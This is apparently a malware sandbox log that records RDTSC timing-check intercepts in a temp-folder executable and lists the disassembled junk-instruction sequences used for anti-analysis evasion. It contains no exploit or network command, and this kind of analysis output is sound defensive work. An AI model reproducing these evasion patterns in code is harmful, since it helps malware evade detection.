Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10A74B2 second address: 10A74D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3460CF0808h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10A75FE second address: 10A7604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10A7604 second address: 10A7608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10A7608 second address: 10A7621 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB96Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F3460BFB966h 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10B2E02 second address: 10B2E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10B2E06 second address: 10B2E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3460BFB966h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F3460BFB972h 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 jmp 00007F3460BFB971h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10B5E78 second address: 10B5E8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF07FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10B7EAD second address: 10B7EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10B7EB1 second address: 10B7EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10B800F second address: 10B801E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3460BFB96Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10BED07 second address: 10BED0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10C8510 second address: 10C8516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10C8516 second address: 10C851C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10C851C second address: 10C8533 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F3460BFB966h 0x00000011 jne 00007F3460BFB966h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10C83AD second address: 10C83B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10C83B1 second address: 10C83BB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3460BFB966h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CEEC2 second address: 10CEEFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3460CF07F6h 0x0000000a popad 0x0000000b jmp 00007F3460CF0805h 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 pushad 0x00000018 jmp 00007F3460CF07FEh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CEEFA second address: 10CEEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CF06D second address: 10CF07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F3460CF0802h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CF1BE second address: 10CF1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F3460BFB96Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CF44C second address: 10CF464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F3460CF07F6h 0x0000000b jnp 00007F3460CF07F6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CF464 second address: 10CF47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3460BFB973h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CF47B second address: 10CF48E instructions: 0x00000000 rdtsc 0x00000002 je 00007F3460CF07F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CF48E second address: 10CF4CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB976h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jc 00007F3460BFB966h 0x00000010 pop ecx 0x00000011 jno 00007F3460BFB96Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jmp 00007F3460BFB96Fh 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CF4CD second address: 10CF4D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CF60A second address: 10CF647 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 ja 00007F3460BFB966h 0x0000000b popad 0x0000000c jng 00007F3460BFB96Eh 0x00000012 pushad 0x00000013 popad 0x00000014 jne 00007F3460BFB966h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3460BFB979h 0x00000023 push edx 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 push esi 0x00000027 pop esi 0x00000028 pop edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CF647 second address: 10CF65E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3460CF07FCh 0x00000008 pushad 0x00000009 jg 00007F3460CF07F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CF65E second address: 10CF666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CF7C5 second address: 10CF7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CF7CB second address: 10CF7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3460BFB970h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CF7E5 second address: 10CF7FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3460CF0805h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CF7FE second address: 10CF802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10CF802 second address: 10CF832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3460CF07FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007F3460CF0809h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10D0199 second address: 10D01A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3460BFB966h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10D01A3 second address: 10D01BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0801h 0x00000007 je 00007F3460CF07F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10D01BE second address: 10D01DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3460BFB978h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10D432A second address: 10D432E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10D661C second address: 10D6624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10D6624 second address: 10D662A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10D662A second address: 10D6646 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB975h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10F67FC second address: 10F6814 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3460CF07FCh 0x00000008 jc 00007F3460CF07F6h 0x0000000e jc 00007F3460CF07FEh 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10F6814 second address: 10F6823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jc 00007F3460BFB985h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10FA037 second address: 10FA041 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3460CF0808h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10FA041 second address: 10FA059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3460BFB96Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F3460BFB966h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1112DE2 second address: 1112E09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3460CF0805h 0x00000008 jp 00007F3460CF07F6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F3460CF07F6h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1112E09 second address: 1112E0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1112E0D second address: 1112E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop esi 0x0000000e jmp 00007F3460CF0801h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1112E2C second address: 1112E4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3460BFB973h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d js 00007F3460BFB96Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FF106B second address: FF107A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3460CF07FBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1111F59 second address: 1111F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3460BFB966h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3460BFB972h 0x00000012 jc 00007F3460BFB96Eh 0x00000018 js 00007F3460BFB966h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 11121E1 second address: 111221B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3460CF0802h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F3460CF0809h 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 111221B second address: 1112221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1112221 second address: 111222E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 ja 00007F3460CF07F6h 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 111292E second address: 1112932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1112932 second address: 1112957 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0809h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1112957 second address: 111295B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 111295B second address: 1112961 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1112AF2 second address: 1112AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 11144C4 second address: 11144DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0807h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1117068 second address: 1117077 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F3460BFB966h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1117077 second address: 111709B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F3460CF0800h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F3460CF07F6h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1117343 second address: 1117385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 stc 0x00000009 push dword ptr [ebp+122D2653h] 0x0000000f call 00007F3460BFB970h 0x00000014 pop edx 0x00000015 jp 00007F3460BFB96Ch 0x0000001b mov dword ptr [ebp+122D194Bh], esi 0x00000021 call 00007F3460BFB969h 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F3460BFB96Ah 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1117385 second address: 111739C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnl 00007F3460CF0804h 0x0000000e pushad 0x0000000f jnl 00007F3460CF07F6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 111739C second address: 11173BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push edx 0x0000000a jl 00007F3460BFB96Ch 0x00000010 pop edx 0x00000011 mov eax, dword ptr [eax] 0x00000013 ja 00007F3460BFB970h 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 111A4D4 second address: 111A4D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A8002F second address: 4A80035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A80035 second address: 4A8003B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A8003B second address: 4A8003F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A8003F second address: 4A8004E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A8004E second address: 4A80054 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A80054 second address: 4A8005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A8005A second address: 4A8005E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60D23 second address: 4A60D38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3460CF07FBh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60D38 second address: 4A60D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F3460BFB96Ch 0x00000012 and cx, EFF8h 0x00000017 jmp 00007F3460BFB96Bh 0x0000001c popfd 0x0000001d mov esi, 147CF12Fh 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 call 00007F3460BFB977h 0x0000002c pop esi 0x0000002d call 00007F3460BFB979h 0x00000032 pop eax 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60D9F second address: 4A60DBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, 2CF4C2C9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 push eax 0x00000011 mov ecx, edx 0x00000013 pop edi 0x00000014 mov ch, F0h 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx ebx, ax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60DBE second address: 4A60DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A60DC4 second address: 4A60DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA0E29 second address: 4AA0E8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dh, CFh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c call 00007F3460BFB971h 0x00000011 mov bx, ax 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F3460BFB977h 0x00000024 sub ax, 2C3Eh 0x00000029 jmp 00007F3460BFB979h 0x0000002e popfd 0x0000002f push esi 0x00000030 pop ebx 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA0E8D second address: 4AA0E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA0E93 second address: 4AA0EB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F3460BFB96Bh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movsx edx, ax 0x00000016 mov dl, ah 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4AA0EB2 second address: 4AA0EBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A400D0 second address: 4A400D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 4A400D6 second address: 4A400E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3460CF07FDh 0x00000009 rdtsc
